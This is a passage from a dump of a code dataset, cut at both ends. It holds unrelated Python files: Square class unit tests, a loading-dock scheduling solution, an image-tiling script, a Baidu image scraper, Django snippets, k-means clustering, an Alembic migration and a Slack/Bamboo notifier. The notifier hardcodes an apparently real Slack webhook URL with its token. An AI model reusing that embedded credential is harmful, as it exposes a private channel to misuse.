self.assertEqual(pepp.total_errors, 0, \"fix pep8\")\n\n def test_class_init(self):\n \"\"\"\n tests for id\n \"\"\"\n self.assertEqual(self.test.id, 1)\n self.assertEqual(self.test1.id, 2)\n self.assertEqual(self.test2.id, 9)\n self.assertEqual(self.test3.id, 4)\n\n def test_class_variables(self):\n \"\"\"\n tests for normal operation\n \"\"\"\n self.assertEqual(self.test.size, 10)\n self.assertEqual(self.test1.size, 1)\n self.assertEqual(self.test2.size, 5)\n self.assertEqual(self.test3.size, 3)\n self.assertEqual(self.test1.x, 2)\n self.assertEqual(self.test2.x, 9)\n self.assertEqual(self.test3.x, 8)\n self.assertEqual(self.test1.y, 5)\n self.assertEqual(self.test2.y, 8)\n self.assertEqual(self.test3.y, 3)\n\n def test_input_errors(self):\n \"\"\"\n tests for improper use\n \"\"\"\n self.assertRaises(TypeError, Square, ())\n\n def test_integer_validator(self):\n \"\"\"\n tests for integer 
validator\n \"\"\"\n with self.assertRaises(TypeError, msg=\"width must be an integer\"):\n temp = Square(\"a\", \"b\")\n with self.assertRaisesRegex(TypeError, \"x must be an integer\"):\n temp = Square(1, \"b\")\n with self.assertRaisesRegex(TypeError, \"y must be an integer\"):\n temp = Square(1, 1, \"b\")\n with self.assertRaisesRegex(ValueError, \"width must be > 0\"):\n temp = Square(-1, -1)\n with self.assertRaisesRegex(ValueError, \"x must be >= 0\"):\n temp = Square(1, -1, -1, -1)\n with self.assertRaisesRegex(ValueError, \"y must be >= 0\"):\n temp = Square(1, 2, -1, -1)\n\n def test_area(self):\n \"\"\"\n tests for area\n \"\"\"\n self.assertEqual(self.test.area(), 100)\n self.assertEqual(self.test1.area(), 1)\n self.assertEqual(self.test2.area(), 25)\n self.assertEqual(self.test3.area(), 9)\n\n def test_display_0_1(self):\n \"\"\"\n tests for string output\n \"\"\"\n @contextmanager\n def test_display():\n new_out = old_out = \"\"\n new_out = StringIO()\n old_out = sys.stdout\n try:\n sys.stdout = new_out\n yield sys.stdout\n finally:\n sys.stdout = old_out\n with test_display() as out:\n temp = Square(3)\n temp.display()\n output = out.getvalue().strip()\n self.assertEqual(output, \"###\\n###\\n###\")\n\n with test_display() as out:\n temp = Square(3, 2, 2)\n temp.display()\n output = out.getvalue()\n self.assertEqual(output, \"\\n\\n ###\\n ###\\n ###\\n\")\n\n def test_str(self):\n \"\"\"\n tests for string rep of instances\n \"\"\"\n self.assertEqual(str(self.test), \"[Square] (1) 0/0 - 10\")\n self.assertEqual(str(self.test1), \"[Square] (2) 2/5 - 1\")\n self.assertEqual(str(self.test2), \"[Square] (9) 9/8 - 5\")\n self.assertEqual(str(self.test3), \"[Square] (4) 8/3 - 3\")\n\n def test_update_0(self):\n \"\"\"\n tests for update via args\n \"\"\"\n temp = Square(5)\n self.assertEqual(temp.size, 5)\n temp.update(3, 4)\n self.assertEqual(temp.id, 3)\n self.assertEqual(temp.size, 4)\n temp.update(9, 8, 7, 6)\n self.assertEqual(temp.id, 9)\n self.assertEqual(temp.size, 8)\n self.assertEqual(temp.x, 7)\n self.assertEqual(temp.y, 6)\n\n def test_update_1(self):\n \"\"\"\n test for kwargs\n \"\"\"\n temp = Square(9, 8, 7, 6)\n self.assertEqual(str(temp), \"[Square] (6) 8/7 - 9\")\n temp.update(id=1)\n self.assertEqual(temp.id, 1)\n temp.update(size=3)\n self.assertEqual(temp.size, 3)\n temp.update(x=4)\n self.assertEqual(temp.x, 4)\n temp.update(y=12)\n self.assertEqual(temp.y, 12)\n\n def test_getter_setter(self):\n \"\"\"\n test for setter / getter\n \"\"\"\n temp = Square(5)\n self.assertEqual(temp.size, 5)\n with self.assertRaisesRegex(TypeError, \"width must be an integer\"):\n temp.size = \"9\"\n\n def test_to_dictionary(self):\n \"\"\"\n test for dictionary output\n \"\"\"\n temp = Square(10, 2, 1, 9)\n r1 = temp.to_dictionary()\n self.assertEqual(r1, {'id': 9, 'x': 2, 'size': 10, 'y': 1})\n\n def test_to_json_string(self):\n \"\"\"\n tests for converting to json\n \"\"\"\n temp = Square(10, 2, 1, 9)\n s1 = temp.to_dictionary()\n s2 = temp.to_json_string(s1)\n self.assertEqual(s2, json.dumps(s1))\n\n def test_json_string_to_file(self):\n \"\"\"\n tests for saving to file\n \"\"\"\n temp1 = Square(5, 6, 2, 9)\n temp2 = Square(1, 2, 3, 4)\n Square.save_to_file([temp1, temp2])\n with open(\"Square.json\") as file:\n r1 = file.read()\n r2 = [temp1.to_dictionary(), temp2.to_dictionary()]\n self.assertEqual(json.dumps(r2), r1)\n\n def test_from_json(self):\n \"\"\"\n tests for converting from json string\n \"\"\"\n temp1 = Square(5, 6, 2, 9)\n temp2 = Square(1, 2, 3, 4)\n r1 = 
[temp1.to_dictionary(), temp2.to_dictionary()]\n        self.assertTrue(isinstance(r1, list))\n        r2 = Square.to_json_string(r1)\n        self.assertTrue(isinstance(r2, str))\n        r3 = Square.from_json_string(r2)\n        self.assertTrue(isinstance(r3, list))\n\n    def test_create(self):\n        \"\"\"\n        tests new instance is independent\n        \"\"\"\n        r1 = Square(4, 8, 9)\n        dict1 = r1.to_dictionary()\n        r2 = Square.create(**dict1)\n        self.assertFalse(r1 is r2)\n        self.assertFalse(r1 == r2)\n\n    def test_load_from_file(self):\n        \"\"\"\n        tests data can be loaded\n        \"\"\"\n        r1 = Square(1, 1, 1)\n        r2 = Square(2, 2, 2)\n        lists = [r1, r2]\n        Square.save_to_file(lists)\n        output = Square.load_from_file()\n        self.assertTrue(isinstance(output, list))\n        o1 = output[0]\n        o2 = output[1]\n        self.assertTrue(isinstance(o1, Square))\n        self.assertTrue(isinstance(o2, Square))\n        self.assertEqual(str(r1), str(o1))\n        self.assertEqual(str(r2), str(o2))\n\n    def test_return_empty(self):\n        \"\"\"\n        tests when passing none\n        \"\"\"\n        output = Square.to_json_string(None)\n        self.assertEqual(output, \"[]\")\n        output = Square.to_json_string([])\n        self.assertEqual(output, \"[]\")\n\n    def test_save_empty(self):\n        \"\"\"\n        tests when list is empty\n        \"\"\"\n        lists = []\n        Square.save_to_file(lists)\n        with open(\"Square.json\", \"r\") as f:\n            self.assertEqual(\"[]\", f.read())\n\n    def test_save_None(self):\n        \"\"\"\n        tests when input is None\n        \"\"\"\n        Square.save_to_file(None)\n        with open(\"Square.json\", \"r\") as f:\n            self.assertEqual(\"[]\", f.read())\n\n    def test_load_no_file(self):\n        \"\"\"\n        tests when there is no file\n        \"\"\"\n        try:\n            Square.save_to_file(None)\n            os.remove(\"Square.json\")\n        except BaseException:\n            pass\n        self.assertEqual(Square.load_from_file(), [])\n\n    def test_load_empty_file(self):\n        \"\"\"\n        tests when file is empty\n        \"\"\"\n        try:\n            Square.save_to_file(None)\n            os.remove(\"Square.json\")\n        except BaseException:\n            pass\n        open(\"Square.json\", 'a').close()\n        self.assertEqual(Square.load_from_file(), [])\n\n    def test_csv(self):\n        \"\"\"\n        tests for csv usage\n        \"\"\"\n        r1 = Square(10, 7, 2, 8)\n        r2 = Square(2, 4)\n        list_input = [r1, r2]\n\n        Square.save_to_file_csv(list_input)\n\n        list_output = Square.load_from_file_csv()\n\n        o1 = list_output[0]\n        o2 = list_output[1]\n        self.assertTrue(isinstance(o1, Square))\n        self.assertTrue(isinstance(o2, Square))\n        self.assertEqual(str(r1), str(o1))\n        self.assertEqual(str(r2), str(o2))\n\n    def test_no_csv(self):\n        \"\"\"\n        test when there is no file\n        \"\"\"\n        try:\n            Square.save_to_file_csv(None)\n            os.remove(\"Square.json\")\n        except BaseException:\n            pass\n        self.assertEqual(Square.load_from_file_csv(), [])\n\n    def test_load_empty_csv(self):\n        \"\"\"\n        tests when file is empty\n        \"\"\"\n        try:\n            Square.save_to_file_csv(None)\n            os.remove(\"Square.json\")\n        except BaseException:\n            pass\n        open(\"Square.json\", 'a').close()\n        self.assertEqual(Square.load_from_file_csv(), [])\n","sub_path":"0x0C-python-almost_a_circle/tests/test_models/test_square.py","file_name":"test_square.py","file_ext":"py","file_size_in_byte":10396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"463347373","text":"'''\nA warehouse has one loading dock that workers use to load and unload goods.\n\nWarehouse workers carrying the goods arrive at the loading dock at different times. They form two queues, a \"loading\" queue and an \"unloading\" queue. 
Within each queue, the workers are ordered by the time they arrive at the dock.\n\nThe arrival time (in minutes) array stores the minute the worker arrives at the loading dock. The direction array stores whether the worker is \"loading\" or \"unloading\": a value of 0 means loading and 1 means unloading.\n\nLoading/unloading takes 1 minute.\n\nWhen a worker arrives at the loading dock, if no other worker is at the dock at the same time, then the worker can use the dock.\n\nIf a \"loading\" worker and an \"unloading\" worker arrive at the dock at the same time, then we decide who can use the dock with these rules:\n\nif the loading dock was not in use in the previous minute, then the unloading worker can use the dock.\nif the loading dock was just used by another unloading worker, then the unloading worker can use the dock.\nif the loading dock was just used by another loading worker, then the loading worker can use the dock.\nReturn an array of the time (in minutes) each worker uses the dock.\n\nExamples\nExample 1:\nInput:\ntime = [0, 0, 1, 6] direction = [0, 1, 1, 0]\n\nOutput:\n[2, 0, 1, 6]\n\nExplanation:\nAt time 0, worker 0 and 1 want to use the dock. Worker 0 wants to load and worker 1 wants to unload. The dock was not used in the previous minute, so worker 1 unloads first.\nAt time 1, workers 0 and 2 want to use the dock. Worker 2 wants to unload, and at the previous minute the dock was used to unload, so worker 2 uses the dock.\nAt time 2, worker 0 is the only worker at the dock, so he uses the dock.\nAt time 6, worker 3 arrives at the empty dock and uses the dock.\nWe return [2, 0, 1, 6].\n'''\n\nfrom typing import List\nfrom collections import deque\n\ndef getTimes(numCustomers: int, arrTime: List[int], direction: List[int]) -> List[int]:\n    \n    load_queue = deque() # workers waiting to load\n    unload_queue = deque() # workers waiting to unload\n    cur_time = -1\n    last_used_type = 'UNLOAD'\n    \n    for i in range(numCustomers):\n        if direction[i] == 0:\n            load_queue.append((arrTime[i], i)) # push (arrival time, worker id) into the queue\n        else:\n            unload_queue.append((arrTime[i], i))\n    \n    ans = [-1] * numCustomers\n    \n    while load_queue and unload_queue:\n        if load_queue[0][0] <= cur_time and unload_queue[0][0] <= cur_time: # workers from both queues are waiting at the dock\n            if cur_time == -1 or last_used_type == 'UNLOAD': # dock idle in the previous minute, or last used for unloading\n                cur_queue = unload_queue\n            else:\n                cur_queue = load_queue\n        elif load_queue[0][0] < unload_queue[0][0]: # only the loading worker has reached the dock\n            cur_queue = load_queue\n        else: # the unloading worker arrived no later than the loading worker\n            cur_queue = unload_queue\n        time, i = cur_queue.popleft()\n        if cur_queue == load_queue:\n            last_used_type = 'LOAD'\n        else:\n            last_used_type = 'UNLOAD'\n        cur_time = max(time, cur_time)\n        ans[i] = cur_time\n        cur_time += 1\n    \n    remaining_queue = load_queue if load_queue else unload_queue\n    \n    while remaining_queue:\n        time, i = remaining_queue.popleft()\n        cur_time = max(time, cur_time)\n        ans[i] = cur_time\n        cur_time += 1\n    \n    return ans\n\nif __name__ == \"__main__\":\n    numCustomers = int(input())\n    arrTime = [int(y) for y in input().split()]\n    direction = [int(z) for z in input().split()]\n    res = getTimes(numCustomers, arrTime, direction)\n    print(' '.join(str(e) for e in 
res))","sub_path":"AmazonOA/turnstile.py","file_name":"turnstile.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"235130273","text":"import os\n\nfrom string import ascii_lowercase as letters\nimport numpy as np\nfrom PIL import Image\n\ndef get_links(info,index,num_classes,cur_class, num=None):\n for i in os.listdir(os.curdir):\n if(i == \"prediction\"):\n if(not cur_class+num in info.keys()):\n info[cur_class+num] = [[0 for j in range(num_classes)]]\n info[cur_class+num][0][index] = os.getcwd()+\"/\" + i\n elif(i == \"signal\"):\n if(not cur_class+num in info.keys()):\n info[cur_class+num] = [[0 for j in range(num_classes)]]\n info[cur_class+num].append(os.getcwd()+\"/\" + i)\n elif(i == \"00\" or i == \"01\" or i==\"02\" or i==\"03\" or i==\"04\"):\n temp = os.getcwd()\n os.chdir(i)\n get_links(info,index,num_classes,cur_class, num=i)\n os.chdir(temp)\n elif(not os.path.isfile(i)):\n temp = os.getcwd()\n os.chdir(i)\n get_links(info,index,num_classes,cur_class,num)\n os.chdir(temp)\n \ndictionary = {}\n\ndef generate_links(info, classes=None,curclass = None):\n for i in os.listdir(os.curdir):\n if(i==\"v1-synthesized\"):\n temp = os.getcwd()\n os.chdir(i)\n classes = os.listdir(os.curdir)\n if('classes.txt' in classes):\n classes.remove('classes.txt')\n #classes.append('membrane_caax_63x')\n classes.sort()\n\n \n F = open(\"classes.txt\",\"a\")\n F.write(str(classes) + \"\\n\")\n F.close()\n \n for j in classes:\n temp2 = os.getcwd()\n os.chdir(j)\n generate_links(info, classes, j)\n os.chdir(temp2)\n os.chdir(temp)\n elif(classes and i in classes):\n temp = os.getcwd()\n os.chdir(i)\n get_links(info,classes.index(i),len(classes),curclass)\n os.chdir(temp)\n elif(not os.path.isfile(i)):\n temp = os.getcwd()\n os.chdir(i)\n generate_links(info,classes,curclass)\n os.chdir(temp)\n\n\n\ntemp = os.getcwd()\nos.chdir('images')\ngenerate_links(dictionary)\nos.chdir(temp)\n\ndef generate_names(n=64,prefix=\"x\"):\n counter = 0\n result = []\n for i in letters:\n for j in letters:\n for k in letters:\n if(counter == n):\n return result\n result.append(prefix + i + j + k)\n counter+=1\n\ndef generate_array(path, names):\n return np.array( [ np.array(Image.open(path + \"/\" + i + \".png\"))/65535.0 for i in names])\n\ndef write_array(dictionary):\n if( os.path.isdir(\"data\") ):\n return\n os.mkdir('data')\n for i in range(14):\n os.mkdir('data/' + str(i))\n counter = 0\n info = open(\"info.txt\",\"w\")\n \n for key in sorted(dictionary.keys()):\n pairs = dictionary[key]\n arrays = []\n print(counter)\n for i in range(len(pairs[0])):\n names = generate_names(len(os.listdir(pairs[0][i])))\n arrays.append(generate_array(pairs[0][i], names))\n print(pairs[1])\n arrays.append(generate_array(pairs[1],names))\n # assert correctness\n assert len(arrays)==14\n for i in range(1,len(arrays)):\n assert arrays[i].shape == arrays[i-1].shape\n \n for d in range(32,arrays[0].shape[0]+1,32):\n for h in range(64,arrays[0].shape[1]+1,64):\n for w in range(64, arrays[0].shape[2]+1,64):\n for i in range(len(arrays)):\n array = arrays[i][d-32:d,h-64:h,w-64:w]\n assert array.shape == (32,64,64)\n np.save('data/'+str(i) + '/' + str(counter), array)\n info = open('data/'+str(i) + '/info.txt','a')\n if(i == 13):\n path = pairs[1]\n else:\n path = pairs[0][i]\n info.write(str(counter) + \"\\t\" + str((d-32,d)) + \"\\t\" + str((h-64,h)) + \"\\t\" + str((w-64,w)) + \"\\t\" + path + \"\\n\")\n info.close()\n counter = counter 
+ 1\n for d in range(32,arrays[0].shape[0]+1,32):\n for h in range(64,arrays[0].shape[1]+1,64):\n for w in range(64, arrays[0].shape[2]+1,64):\n for i in range(len(arrays)):\n shape = arrays[i].shape\n array = arrays[i][shape[0]-d:shape[0]-d+32,shape[1]-h:shape[1]-h+64,shape[2]-w:shape[2]-w+64]\n assert array.shape == (32,64,64)\n np.save('data/'+str(i) + '/' + str(counter), array)\n info = open('data/'+str(i) + '/info.txt','a')\n if(i == 13):\n path = pairs[1]\n else:\n path = pairs[0][i]\n info.write(str(counter) + \"\\t\" + str((shape[0]-d,shape[0]-d+32)) + \"\\t\" + str((shape[1]-h,shape[1]-h+64)) + \"\\t\" + str((shape[2]-w,shape[2]-w+64)) + \"\\t\" + path + \"\\n\")\n info.close()\n counter = counter + 1\n \nwrite_array(dictionary)\n \n#indices = []\n#validation_failed = False\n\n\"\"\"\nfor key in sorted(dictionary.keys()):\n #if(key == 'alpha_tubulin03' or key == 'fibrillarin03' or key == 'lamin_b100'):\n # continue\n pairs = dictionary[key]\n s = \"\"\n index = 0\n for i in pairs[0]:\n #if(index>=len(indices)):\n # indices.append(i.split('\\\\')[11])\n #else:\n # validation_failed = i.split('\\\\')[11] != indices[index]\n s+= i + \",\"\n index+=1\n s=s[:-1]\n s=s+\"\\t\"+pairs[1]\n print(s)\n\"\"\"\n\n#print indices\n#print validation_failed\n\n\n\"\"\"print os.getcwd()\nos.chdir(\"images\")\nos.chdir('AICS')\nos.chdir('BF-FM')\nos.chdir('v1-synthesized')\nos.chdir('dna')\nos.chdir('evaluate')\nos.chdir('dna')\nos.chdir('03')\nprint os.getcwd()\nprint os.listdir(os.getcwd())\"\"\"\n","sub_path":"processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":6354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"638237412","text":"from urllib.parse import urlencode\r\n\r\nimport requests\r\nfrom requests import RequestException\r\n\r\nimport json\r\n\r\nfrom multiprocessing import Pool\r\n\r\nfrom config import *\r\n\r\nimport os\r\n\r\n\r\nclass Spider(object):\r\n def __init__(self):\r\n self.__counter = 0\r\n self.__path = 'C:/Users/COLDPLAY/Desktop'\r\n self.__timeout = 0.5\r\n\r\n def __get_page_index(self, pn):\r\n data = {\r\n 'tn': 'resultjsonavatarnew',\r\n 'word': KEYWORD,\r\n 'pn': pn\r\n }\r\n url = 'http://image.baidu.com/search/avatarjson?' 
+ urlencode(data)\r\n        print(url)\r\n        try:\r\n            response = requests.get(url)\r\n            if response.status_code == 200:\r\n                return response.text\r\n            return None\r\n        except RequestException:\r\n            print('Failed to request the index page...')\r\n            return None\r\n\r\n    def __parse_page_index(self, html):\r\n        try:\r\n            data = json.loads(html)\r\n            for item in data.get('imgs'):\r\n                yield item.get('objURL')\r\n                # print(item.get('objURL'))\r\n        except json.JSONDecodeError:\r\n            pass\r\n\r\n    def __save_images(self, urls):\r\n        path = self.__path + '/' + KEYWORD\r\n        if not os.path.exists(path):\r\n            os.mkdir(path)\r\n        for url in urls:\r\n            self.__download_images(url, path)\r\n\r\n    def __download_images(self, url, path):\r\n\r\n        print('Downloading image ' + str(self.__counter) + '...')\r\n        try:\r\n            response = requests.get(url)\r\n            if response.status_code == 200:\r\n                with open(path + '/' + str(self.__counter) + '.jpg', 'wb') as f:\r\n                    f.write(response.content)\r\n                    self.__counter += 1\r\n            else:\r\n                print('Download failed')\r\n        except Exception:\r\n            print('Download failed')\r\n\r\n    def craw(self, pn):\r\n        html = self.__get_page_index(pn)\r\n        urls = self.__parse_page_index(html)\r\n        self.__save_images(urls)\r\n\r\n\r\n# def main(pn):\r\n#     spider = Spider()\r\n#     spider.craw(pn)\r\n\r\nif __name__ == '__main__':\r\n    spider = Spider()\r\n    # groups = [x for x in range(GROUP_START, GROUP_END)]\r\n    # pool = Pool()\r\n    # pool.map(spider.craw, groups)\r\n    while GROUP_START <= GROUP_END:\r\n        print('Downloading page ' + str(GROUP_START) + '...')\r\n        spider.craw(GROUP_START)\r\n        GROUP_START += 1\r\n","sub_path":"ProjectCode/BaiduTupian/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"105806122","text":"from django.urls import path, include\nfrom . 
import views\nfrom django.contrib.auth.views import LoginView, LogoutView\n\n\nurlpatterns = [\n path('', views.all, name = 'forum_homepage'),\n path('newpost', views.NewPost.as_view(), name= 'new_post'),\n path('post', views.single_post, name= 'single_post'),\n path('post//delete', views.DeletePost.as_view(), name= 'delete_post'),\n path('comment//delete', views.DeleteComment.as_view(), name= 'delete_comment'),\n\n]","sub_path":"forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"1863084","text":"from django import forms\nfrom .models import USERMODEL, Extra\nfrom django.forms.fields import DateField\nfrom django.contrib.admin.widgets import AdminDateWidget\nfrom django.forms.widgets import DateInput\n\nclass UserTypeForm(forms.ModelForm):\n class Meta:\n model = USERMODEL\n labels = {'aname':'Name','type':'Account Type','phno':'Mobile Number','dob':'Date of Birth','bg':'Blood Group','sex':'Sex:'}\n fields = ['aname','type','phno','dob','bg','sex']\n widgets={\n 'dob': DateInput(attrs={'type':'date'})\n }\n\nclass ExtraForm(forms.ModelForm):\n class Meta:\n model = Extra\n fields =['qu','fi']\n labels = {'qu':'Qualifications','fi':'Field of Expertise'}\n","sub_path":"connectcare/profiledet/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"199759071","text":"import pandas as pd\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn import metrics\r\n\r\n# DEFINE VARIABLES\r\n\r\n\r\n#define Input/Output Files\r\n\r\ninfile = 'Issuances_Tots.csv'\r\noutfile = 'Issuances_Tots_out.csv'\r\n\r\n#Import file\r\n\r\ndf = pd.read_csv(infile)\r\n\r\n#Set Index Field\r\n\r\ndf.set_index(['Guest_ID'], inplace=True)\r\n\r\n#Fill Nulls/NaN\r\n\r\ndf.fillna(value=0, inplace=True)\r\n\r\n# define data columns\r\n\r\ncols = df.columns.values.tolist()\r\n\r\ndata = df[cols]\r\n\r\ndata_array = data.values\r\n\r\nprint(\"Data Imported and Defined\")\r\n\r\nfor i in range(2, 11):\r\n #Define Kmeans Analysis\r\n\r\n kmeans_calc = KMeans(init='k-means++', n_clusters=i, n_init=600)\r\n\r\n #Run kmeans on dataframe\r\n\r\n kmeans_calc.fit(df)\r\n\r\n #Add resulting array to dataframe\r\n\r\n df['kmeans_group' + str(i)] = kmeans_calc.labels_\r\n\r\n # define target\r\n\r\n target = df['kmeans_group' + str(i)]\r\n\r\n target_array = target.values\r\n\r\n # Run Silhouette Score\r\n\r\n df['sil' + str(i)] = metrics.silhouette_score(data_array, target_array, sample_size=1000)\r\n\r\n print(\"finished \" + str(i) + \" cluster groups\")\r\n\r\n#Output dataframe to csv\r\n\r\ndf.to_csv(outfile)\r\n\r\n","sub_path":"Analysis/clusteringloop.py","file_name":"clusteringloop.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"191830722","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\nimport requests\nfrom furl import furl\nfrom slack_bang import app_config, channel_tokens\n\nDEFAULT_WEBHOOK_URI = app_config.get('slack_webhook_uri', 'https://hooks.slack.com/services/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')\nBAMBOO_URL = app_config.get('BAMBOO_URL', os.getenv('BAMBOO_URL', 'https://bamboo.dglecom.net'))\nBAMBOO_USER = app_config.get('BAMBOO_USER', os.getenv('BAMBOO_USER'))\nBAMBOO_PASSWORD = app_config.get('BAMBOO_PASSWORD', os.getenv('BAMBOO_PASSWORD'))\n\nclass 
SlackPostException(Exception):\n pass\n\n\nclass UnauthorizedException(Exception):\n pass\n\n\nclass GenericMessageService(object):\n WEBHOOK_URI = DEFAULT_WEBHOOK_URI\n\n def __init__(self, token, channel, text, *args, **kwargs):\n self.token = token\n self.channel = channel\n self.text = text\n self.attachments = json.loads(kwargs.get('attachments', '[]'))\n\n if channel_tokens.get(token) != channel:\n raise UnauthorizedException('Token {t} is not allowed to post to channel {c}'.format(t=token, c=channel))\n\n # optionals\n self.username = kwargs.get('username', 'monkey-bot')\n self.emoji = kwargs.get('emoji', ':monkey_face:')\n self.webhook_url = kwargs.get('webhook_url', self.WEBHOOK_URI)\n\n def process(self):\n data = {\n \"text\": self.text,\n \"channel\": \"#{channel}\".format(channel=self.channel),\n \"link_names\": 1,\n \"username\": self.username,\n \"icon_emoji\": \"{emoji}\".format(emoji=self.emoji),\n }\n\n if self.attachments: # may not be null at slack\n data['attachments'] = self.attachments\n\n resp = requests.post(self.webhook_url, json=data)\n\n if resp.ok:\n return resp\n else:\n raise SlackPostException(resp.content)\n\n\nclass ProjectBuildService(object):\n WEBHOOK_URI = DEFAULT_WEBHOOK_URI\n\n def __init__(self, version, plan_name, build_url, channel, *args, **kwargs):\n self.version = version\n self.plan_name = plan_name\n self.build_url = build_url\n self.channel = channel\n\n # optionals\n self.text = kwargs.get('text', \"Build Complete: {build_url}\".format(build_url=self.build_url))\n\n self.plan, self.build_no = self.bamboo_build_url_components(build_url=self.build_url)\n\n if self.plan and self.build_no:\n self.build_result = self.get_bamboo_build_result(plan=self.plan,\n build_no=self.build_no)\n\n self.username = kwargs.get('username', 'build-info')\n\n self.emoji = kwargs.get('emoji', ':cherries:')\n self.webhook_url = kwargs.get('webhook_url', self.WEBHOOK_URI)\n\n def bamboo_build_url_components(self, build_url):\n url = furl(build_url)\n build = str(url.path).split('/')\n try:\n build_name = build[-1:][0]\n # ['OBB', 'DB', '152']\n build_no = build_name.split('-')[-1:][0]\n # ['152']\n plan = '-'.join(build_name.split('-')[0:-1])\n # 'OBB-DB'\n return plan, build_no\n except IndexError:\n return None, None\n\n def get_bamboo_build_result(self, plan, build_no):\n # https://bamboo.dglecom.net/rest/api/latest/result/OBB-DB/152.json\n url = furl('{url}/rest/api/latest/result/{plan}/{build_no}.json'.format(url=BAMBOO_URL,\n plan=plan,\n build_no=build_no))\n resp = requests.get(url, auth=(BAMBOO_USER, BAMBOO_PASSWORD))\n data = {}\n if resp.ok:\n data = resp.json()\n return data.get('state', 'Unknown')\n\n def process(self):\n attachments = [{\n \"text\": \"Version: {version}\".format(version=self.version)\n }]\n\n if self.plan_name:\n attachments.append({\"text\": \"Plan: {plan_name}\".format(plan_name=self.plan_name)})\n if self.build_url:\n attachments.append({\"text\": \"Build: {build_url}\".format(build_url=self.build_url)})\n if self.build_result:\n attachments.append({\"text\": \"Result: {build_result}\".format(build_result=self.build_result)})\n\n data = {\n \"text\": self.text,\n \"attachments\": attachments,\n \"channel\": \"{channel}\".format(channel=self.channel),\n \"link_names\": 1,\n \"username\": self.username,\n \"icon_emoji\": \"{emoji}\".format(emoji=self.emoji)\n }\n\n resp = requests.post(self.webhook_url, json=data)\n if resp.ok:\n return resp\n else:\n raise 
SlackPostException(resp.content)","sub_path":"src/slack_bang/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"239316676","text":"\"\"\"empty message\n\nRevision ID: 8e1946a2db65\nRevises: 479a14cf9fee\nCreate Date: 2020-08-23 02:15:35.285398\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '8e1946a2db65'\ndown_revision = '479a14cf9fee'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('projects',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=128), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_index(op.f('ix_projects_timestamp'), 'projects', ['timestamp'], unique=False)\n op.create_table('user_projects',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('project_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['project_id'], ['projects.id'], ondelete='CASCADE'),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n op.drop_index('ix_project_timestamp', table_name='project')\n op.drop_table('project')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('project',\n sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('body', sa.VARCHAR(length=140), nullable=True),\n sa.Column('timestamp', sa.DATETIME(), nullable=True),\n sa.Column('user_id', sa.INTEGER(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index('ix_project_timestamp', 'project', ['timestamp'], unique=False)\n op.drop_table('user_projects')\n op.drop_index(op.f('ix_projects_timestamp'), table_name='projects')\n op.drop_table('projects')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/8e1946a2db65_.py","file_name":"8e1946a2db65_.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"546427502","text":"from constants import *\nfrom sokr import *\nfrom terrain import *\n\ndef data():\n \"\"\"Локальный поставщик диалогов на рынок\"\"\"\n D1 = \"dialogue\"\n D2 = \"tutorialup\"\n \n \"\"\"Блоки, присутствующие в зоне\"\"\"\n \"\"\"По старинному обычаю - только исполняемые, т.к. 
